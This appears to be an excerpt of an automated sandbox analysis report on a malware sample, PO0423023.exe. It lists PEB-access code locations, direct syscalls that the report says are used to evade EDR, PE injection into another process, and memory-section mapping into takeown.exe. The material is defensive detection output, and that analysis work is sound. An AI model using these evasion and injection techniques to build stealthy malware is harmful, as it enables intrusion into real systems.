Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A489B3 mov eax, dword ptr fs:[00000030h]	3_2_01A489B3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C09AD mov eax, dword ptr fs:[00000030h]	3_2_019C09AD
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C09AD mov eax, dword ptr fs:[00000030h]	3_2_019C09AD
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0 mov eax, dword ptr fs:[00000030h]	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4E9E0 mov eax, dword ptr fs:[00000030h]	3_2_01A4E9E0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA9D0 mov eax, dword ptr fs:[00000030h]	3_2_019CA9D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA9D0 mov eax, dword ptr fs:[00000030h]	3_2_019CA9D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA9D0 mov eax, dword ptr fs:[00000030h]	3_2_019CA9D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA9D0 mov eax, dword ptr fs:[00000030h]	3_2_019CA9D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA9D0 mov eax, dword ptr fs:[00000030h]	3_2_019CA9D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA9D0 mov eax, dword ptr fs:[00000030h]	3_2_019CA9D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F49D0 mov eax, dword ptr fs:[00000030h]	3_2_019F49D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A569C0 mov eax, dword ptr fs:[00000030h]	3_2_01A569C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F29F9 mov eax, dword ptr fs:[00000030h]	3_2_019F29F9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F29F9 mov eax, dword ptr fs:[00000030h]	3_2_019F29F9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8A9D3 mov eax, dword ptr fs:[00000030h]	3_2_01A8A9D3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B8918 mov eax, dword ptr fs:[00000030h]	3_2_019B8918
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B8918 mov eax, dword ptr fs:[00000030h]	3_2_019B8918
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4892A mov eax, dword ptr fs:[00000030h]	3_2_01A4892A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A5892B mov eax, dword ptr fs:[00000030h]	3_2_01A5892B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E908 mov eax, dword ptr fs:[00000030h]	3_2_01A3E908
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E908 mov eax, dword ptr fs:[00000030h]	3_2_01A3E908
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4C912 mov eax, dword ptr fs:[00000030h]	3_2_01A4C912
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A0096E mov eax, dword ptr fs:[00000030h]	3_2_01A0096E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A0096E mov edx, dword ptr fs:[00000030h]	3_2_01A0096E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A0096E mov eax, dword ptr fs:[00000030h]	3_2_01A0096E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4C97C mov eax, dword ptr fs:[00000030h]	3_2_01A4C97C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A64978 mov eax, dword ptr fs:[00000030h]	3_2_01A64978
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A64978 mov eax, dword ptr fs:[00000030h]	3_2_01A64978
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A40946 mov eax, dword ptr fs:[00000030h]	3_2_01A40946
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94940 mov eax, dword ptr fs:[00000030h]	3_2_01A94940
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E6962 mov eax, dword ptr fs:[00000030h]	3_2_019E6962
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E6962 mov eax, dword ptr fs:[00000030h]	3_2_019E6962
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E6962 mov eax, dword ptr fs:[00000030h]	3_2_019E6962
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0887 mov eax, dword ptr fs:[00000030h]	3_2_019C0887
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4C89D mov eax, dword ptr fs:[00000030h]	3_2_01A4C89D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8A8E4 mov eax, dword ptr fs:[00000030h]	3_2_01A8A8E4
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EE8C0 mov eax, dword ptr fs:[00000030h]	3_2_019EE8C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC8F9 mov eax, dword ptr fs:[00000030h]	3_2_019FC8F9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FC8F9 mov eax, dword ptr fs:[00000030h]	3_2_019FC8F9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A908C0 mov eax, dword ptr fs:[00000030h]	3_2_01A908C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6483A mov eax, dword ptr fs:[00000030h]	3_2_01A6483A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6483A mov eax, dword ptr fs:[00000030h]	3_2_01A6483A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E2835 mov eax, dword ptr fs:[00000030h]	3_2_019E2835
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E2835 mov eax, dword ptr fs:[00000030h]	3_2_019E2835
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E2835 mov eax, dword ptr fs:[00000030h]	3_2_019E2835
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E2835 mov ecx, dword ptr fs:[00000030h]	3_2_019E2835
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E2835 mov eax, dword ptr fs:[00000030h]	3_2_019E2835
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E2835 mov eax, dword ptr fs:[00000030h]	3_2_019E2835
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA830 mov eax, dword ptr fs:[00000030h]	3_2_019FA830
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4C810 mov eax, dword ptr fs:[00000030h]	3_2_01A4C810
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C4859 mov eax, dword ptr fs:[00000030h]	3_2_019C4859
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C4859 mov eax, dword ptr fs:[00000030h]	3_2_019C4859
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F0854 mov eax, dword ptr fs:[00000030h]	3_2_019F0854
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A56870 mov eax, dword ptr fs:[00000030h]	3_2_01A56870
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A56870 mov eax, dword ptr fs:[00000030h]	3_2_01A56870
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4E872 mov eax, dword ptr fs:[00000030h]	3_2_01A4E872
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4E872 mov eax, dword ptr fs:[00000030h]	3_2_01A4E872
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D2840 mov ecx, dword ptr fs:[00000030h]	3_2_019D2840
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A74BB0 mov eax, dword ptr fs:[00000030h]	3_2_01A74BB0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A74BB0 mov eax, dword ptr fs:[00000030h]	3_2_01A74BB0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0BBE mov eax, dword ptr fs:[00000030h]	3_2_019D0BBE
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0BBE mov eax, dword ptr fs:[00000030h]	3_2_019D0BBE
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0BCD mov eax, dword ptr fs:[00000030h]	3_2_019C0BCD
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0BCD mov eax, dword ptr fs:[00000030h]	3_2_019C0BCD
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0BCD mov eax, dword ptr fs:[00000030h]	3_2_019C0BCD
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4CBF0 mov eax, dword ptr fs:[00000030h]	3_2_01A4CBF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E0BCB mov eax, dword ptr fs:[00000030h]	3_2_019E0BCB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E0BCB mov eax, dword ptr fs:[00000030h]	3_2_019E0BCB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E0BCB mov eax, dword ptr fs:[00000030h]	3_2_019E0BCB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EEBFC mov eax, dword ptr fs:[00000030h]	3_2_019EEBFC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8BF0 mov eax, dword ptr fs:[00000030h]	3_2_019C8BF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8BF0 mov eax, dword ptr fs:[00000030h]	3_2_019C8BF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8BF0 mov eax, dword ptr fs:[00000030h]	3_2_019C8BF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6EBD0 mov eax, dword ptr fs:[00000030h]	3_2_01A6EBD0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A88B28 mov eax, dword ptr fs:[00000030h]	3_2_01A88B28
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A88B28 mov eax, dword ptr fs:[00000030h]	3_2_01A88B28
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94B00 mov eax, dword ptr fs:[00000030h]	3_2_01A94B00
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	3_2_01A3EB1D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EEB20 mov eax, dword ptr fs:[00000030h]	3_2_019EEB20
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EEB20 mov eax, dword ptr fs:[00000030h]	3_2_019EEB20
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B8B50 mov eax, dword ptr fs:[00000030h]	3_2_019B8B50
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A68B42 mov eax, dword ptr fs:[00000030h]	3_2_01A68B42
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A56B40 mov eax, dword ptr fs:[00000030h]	3_2_01A56B40
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A56B40 mov eax, dword ptr fs:[00000030h]	3_2_01A56B40
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BCB7E mov eax, dword ptr fs:[00000030h]	3_2_019BCB7E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8AB40 mov eax, dword ptr fs:[00000030h]	3_2_01A8AB40
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A74B4B mov eax, dword ptr fs:[00000030h]	3_2_01A74B4B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A74B4B mov eax, dword ptr fs:[00000030h]	3_2_01A74B4B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6EB50 mov eax, dword ptr fs:[00000030h]	3_2_01A6EB50
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A92B57 mov eax, dword ptr fs:[00000030h]	3_2_01A92B57
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A92B57 mov eax, dword ptr fs:[00000030h]	3_2_01A92B57
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A92B57 mov eax, dword ptr fs:[00000030h]	3_2_01A92B57
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A92B57 mov eax, dword ptr fs:[00000030h]	3_2_01A92B57
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A16AA4 mov eax, dword ptr fs:[00000030h]	3_2_01A16AA4
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F8A90 mov edx, dword ptr fs:[00000030h]	3_2_019F8A90
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80 mov eax, dword ptr fs:[00000030h]	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94A80 mov eax, dword ptr fs:[00000030h]	3_2_01A94A80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8AA0 mov eax, dword ptr fs:[00000030h]	3_2_019C8AA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C8AA0 mov eax, dword ptr fs:[00000030h]	3_2_019C8AA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0AD0 mov eax, dword ptr fs:[00000030h]	3_2_019C0AD0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F4AD0 mov eax, dword ptr fs:[00000030h]	3_2_019F4AD0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F4AD0 mov eax, dword ptr fs:[00000030h]	3_2_019F4AD0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A16ACC mov eax, dword ptr fs:[00000030h]	3_2_01A16ACC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A16ACC mov eax, dword ptr fs:[00000030h]	3_2_01A16ACC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A16ACC mov eax, dword ptr fs:[00000030h]	3_2_01A16ACC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FAAEE mov eax, dword ptr fs:[00000030h]	3_2_019FAAEE
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FAAEE mov eax, dword ptr fs:[00000030h]	3_2_019FAAEE
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FCA38 mov eax, dword ptr fs:[00000030h]	3_2_019FCA38
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E4A35 mov eax, dword ptr fs:[00000030h]	3_2_019E4A35
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E4A35 mov eax, dword ptr fs:[00000030h]	3_2_019E4A35
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EEA2E mov eax, dword ptr fs:[00000030h]	3_2_019EEA2E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4CA11 mov eax, dword ptr fs:[00000030h]	3_2_01A4CA11
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FCA24 mov eax, dword ptr fs:[00000030h]	3_2_019FCA24
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0A5B mov eax, dword ptr fs:[00000030h]	3_2_019D0A5B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0A5B mov eax, dword ptr fs:[00000030h]	3_2_019D0A5B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6EA60 mov eax, dword ptr fs:[00000030h]	3_2_01A6EA60
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C6A50 mov eax, dword ptr fs:[00000030h]	3_2_019C6A50

Source: C:\Users\user\Desktop\PO0423023.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO0423023.exe

Memory written: C:\Users\user\Desktop\PO0423023.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: NULL target: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe protection: execute and read and write	Jump to behavior
